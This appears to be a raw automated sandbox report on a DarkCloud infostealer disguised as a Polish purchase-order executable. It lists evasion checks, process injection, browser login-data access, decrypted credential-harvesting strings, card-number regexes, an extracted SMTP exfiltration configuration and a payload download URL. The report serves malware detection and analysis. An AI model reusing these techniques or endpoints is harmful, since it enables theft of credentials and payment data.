Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97403	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97057	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96447	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95656	Jump to behavior

Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000005.00000002.2231461639.0000017F4AC12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WebData.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2111378125.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2286664528.000000000119C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: WebData.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Users\user\AppData\Roaming\FieldNames.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.132.193.46	erkasera.com	Turkey		42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
162.55.60.2	showip.net	United States		35893	ACPCA	false

Contacted Domains

Name	IP	Active
showip.net	162.55.60.2	true
erkasera.com	188.132.193.46	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://erkasera.com/ruurew/Cwfuvfaf.wav	false		unknown

AV Detection

Found malware configuration

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "SMTP", "To Address": "info@asterilpanel.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\FieldNames.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Cookies
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Default\Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password :
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: SMTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: NNTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Email
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail User Name
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail Server
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Mastercard
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Master Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: mail\
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Foxmail.exe
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: EnableSignature
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Application : FoxMail
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedUsername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: logins
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedPassword
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: purchase01.qualitydevlopments@gmail.com
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserver
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserverport
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpusessl
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendpassword

Uses 32bit PE files

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 162.55.60.2 162.55.60.2

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: showip.net

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49800 -> 162.55.60.2:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 7_2_004329F0 InternetOpenA,InternetOpenUrlA,InternetReadFile,

7_2_004329F0

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: showip.net

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: http://127.0.0.1:
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net#
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/#(
Source: InstallUtil.exe, 00000002.00000002.3306426620.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/%Y
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/;
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/X
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/dF
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/h
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netF
